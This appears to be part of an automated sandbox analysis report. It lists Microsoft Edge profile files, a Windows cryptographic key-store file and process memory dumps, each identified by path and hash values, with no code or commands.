C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b0a65b2653a7ef4a114a955d7e2a622f |
| SHA1 | 690a56763a7fb21016cb26094337a195678fb8a7 |
| SHA256 | a05c8e00594885eb28e3d9e26eb8541cf57ab940e1a9887486958724db68d9f7 |
| SHA512 | dd81bd2fa3e7a75cc714036feddd09251870c3e4269500e0b5418531d9d189b3e69768987740b2ad7e7f38e932eb2a04b3e563a578ffdab0064b78e29998b57a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 02bb8e97e505c1e118f6fccbf4c7f861 |
| SHA1 | f69d54cd2f82ad0d36b943e70c78b0e10ee78430 |
| SHA256 | 9cc8765766fa3b1e437df4818ed0bc2bee0a2b18fc7f51c3f96577629dec6387 |
| SHA512 | cd1a6f799cb23ad2e6310c4eb4ad5475bd303b7647966c8dd9114638e4eac2b6c1737bd492353f6e0caee7c21f8d88752a375981234b3db71479e9e4f83f7daa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 30772dae3ba4f21f0e8b576871624f4e |
| SHA1 | 47a898e67494cc8a19e91d87c3952acb8780fb6d |
| SHA256 | 6c6eba42979b22b5b5b3ebf5ef65c5fafdf88539119eb491f24fad15277e0e06 |
| SHA512 | a36a2157fc098b3823980ca6868d237056ce553e9130ac0ea6a626e90032734203175faaac933d167dba9f59ac67c81fd96d1bde1d84d1295a6afb71adeba66c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5a83a8.TMP
| MD5 | 81cdfee7f70ba7539c582a88b3b44fd7 |
| SHA1 | d75d0a5d7f226214f1e9d665432c7ac89409fd0d |
| SHA256 | 7d49051a47b7427bf044f60f39a1a47084fb1969d7ec14e8a5046d4d72442554 |
| SHA512 | 6aea4256bb557da384ca529e616390533acab120463ed283acb9efa258cc382c5bbfc083606501495ee701254ea12433f15829e77dc2c4bd06d6ff225c11902d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b364226d880119bdc498fcd1e92c9f68 |
| SHA1 | f5d9979654d08f198e3d3dc661e08b2597eaca02 |
| SHA256 | 6c60c1e32f605ac48cd1d9dea671c46e22d868a947dcdde3d4093c47096482e9 |
| SHA512 | 42f72d7d160e0b883009bd2ac76b14f78da590c3566514d61c6d0380f3db9fab8786af43218e869f8ec2aa8cb23899690bf4f8f3410657f3dedb331f9690f315 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 263873fd2ad0c10f02404b207d1190b8 |
| SHA1 | ed65c13e6f730b2d7e6da669b9f0c76a1683b26a |
| SHA256 | 976cb80c6c561faf6b70b761ec1f5347718a2557820bf64b92cdaf46fd21c6c0 |
| SHA512 | 3fe38c79c35be5058008d0309ff6438bc2760aaccbdeb851cd9fcd223cb8e58997ff6bc9383e0b9cd079f7e10d44379bf3dcf38f853e8c1e17e60b59f0cd0562 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8a73fdff70d2f7012d60f4f305a27852 |
| SHA1 | f196eef59676d777846c11fdbe2f4595aa982910 |
| SHA256 | 4a6f967836ac15005e4959ae91821e6d4552c2406e5005c945ec4bd0f9fb63a9 |
| SHA512 | fa39a315b876acc784e992079bf465e8830da5d780935e9f79938bc9843ce069f11a288f9d699b1d359ad8aa1b107c6070e2bbcbd79e0ca749a48f356b7295c5 |
memory/6028-544-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp
memory/6028-545-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp
memory/6028-546-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp
memory/6028-547-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp
memory/6028-548-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d03cb29dab407a31240f04acd2ea54d5 |
| SHA1 | 40e4fea68fa1ddb2c05ee3ca6b45e2740344ba7b |
| SHA256 | 6403bdd730b256bfad120c929db6602600c84707c5743a9f7666084085e1b9fe |
| SHA512 | 1ae1790ee6265f5701d1696d855fd065b5447b6e8eab18f5d2393e16cda4f192c9d125d80c8bfd68cecc855d9d1cd2462be0fc6daa726bb97920ecb5f7746dae |
memory/6028-550-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp
memory/6028-549-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | 07bd004322d7b2832709191bddd0567a |
| SHA1 | 9149ed0c2466995a3b6dd5182865a78fd76ec0ea |
| SHA256 | 6160a9f25b0dba39f0325b3268e0c00e2c374fd278fd1e90edc2fa87271b55bd |
| SHA512 | 28de08cc0284652a62600ea99583a758e83b8c79e10982a8fb11058bb5bfeac5570ecc51b4c58589e8f1b821645839ea5639dbdea2071bd1af9d0d4145e2d944 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2551177587-3778486488-1329702901-1000\83aa4cc77f591dfc2374580bbd95f6ba_f3dcadc9-113d-4c66-8517-189abc125a61
| MD5 | c8366ae350e7019aefc9d1e6e6a498c6 |
| SHA1 | 5731d8a3e6568a5f2dfbbc87e3db9637df280b61 |
| SHA256 | 11e6aca8e682c046c83b721eeb5c72c5ef03cb5936c60df6f4993511ddc61238 |
| SHA512 | 33c980d5a638bfc791de291ebf4b6d263b384247ab27f261a54025108f2f85374b579a026e545f81395736dd40fa4696f2163ca17640dd47f1c42bc9971b18cd |
memory/6028-729-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp
memory/6028-757-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7a7b39ab2b35bea67f90050cb2ad1caa |
| SHA1 | e519ce5d656032a0435deb56e9cdee0a9159edf4 |
| SHA256 | d770282ba7d589cca06af59f1ebdb7f46a1e27412acd63153b0bc0b860e8c2a1 |
| SHA512 | a9e900ed7775cc45337f4e74655ecd6ccdae715ec397c3487c6a2d01bcf327b0950ff16b04eca2ed760c0011ed210fbc42e37952499509aef866142b2119052a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7d87af219fe4088e07c33886edaba040 |
| SHA1 | 72dc27f6b49b0bd9e520c391f9986a16132c0e56 |
| SHA256 | 1cff4da5fb2be3aae9da26184004ce2973f07909702053f0fbf01ffbfacaa767 |
| SHA512 | ffb51c2c6fa5f3c68d9d6b5d62c4b946c40ec8fc8d47f0cf1cc2070b7acef983a3350c0201138f8536585c503427a7c8c7f72e92100c89b297d2bb7eff62a5d3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 6b318b908a9618017e97ab21fdbbb339 |
| SHA1 | 9122af9f2814c73c0dd158b329f1d434e05e2966 |
| SHA256 | 6ea1b85df4b6c151b00f8e7b88396f10c3052f42e62767893d2fc6862f3eb026 |
| SHA512 | 8f94a7742470b4d18b3f70859e3903be55d2bcb6a01421f49dbb4e685e3365798914201b905e849e5ca8b01eb97cd74237d3a3389d777c3be23529d0c27d7f5c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 717451e9ea2787fbc0966f9584b0e4cc |
| SHA1 | 636b3104f3d3410dbe0bd3944ad9629f771529e4 |
| SHA256 | d7d579814018385fcafdafeab2d622dbb234eea487cc77cfef9dc7cbd4adde99 |
| SHA512 | 8178a5471deb17e234624625562141e9e22455465f32457230e4dc85c8d833975ef598232a660367b05c182910313564e16f2f0571a1ad310b7bd7f6e957a590 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 9269ebfd6a99751ed8995ff3e3f8179b |
| SHA1 | a8062f75a114d0dcc731952e40ae42e86ac8dd73 |
| SHA256 | 3bc18611978785f6c8f45e106ad1d155e3ff0536c4946db796a54eb7c29369b1 |
| SHA512 | a10d50fbdf5aa47500583b41821bd0acb1ac0f5bd6eb7b973dad8ec9b9a69a91df12d06a8b95c57272ff0430ca95acc1628d276ea93270c2746ef39fe945bb2b |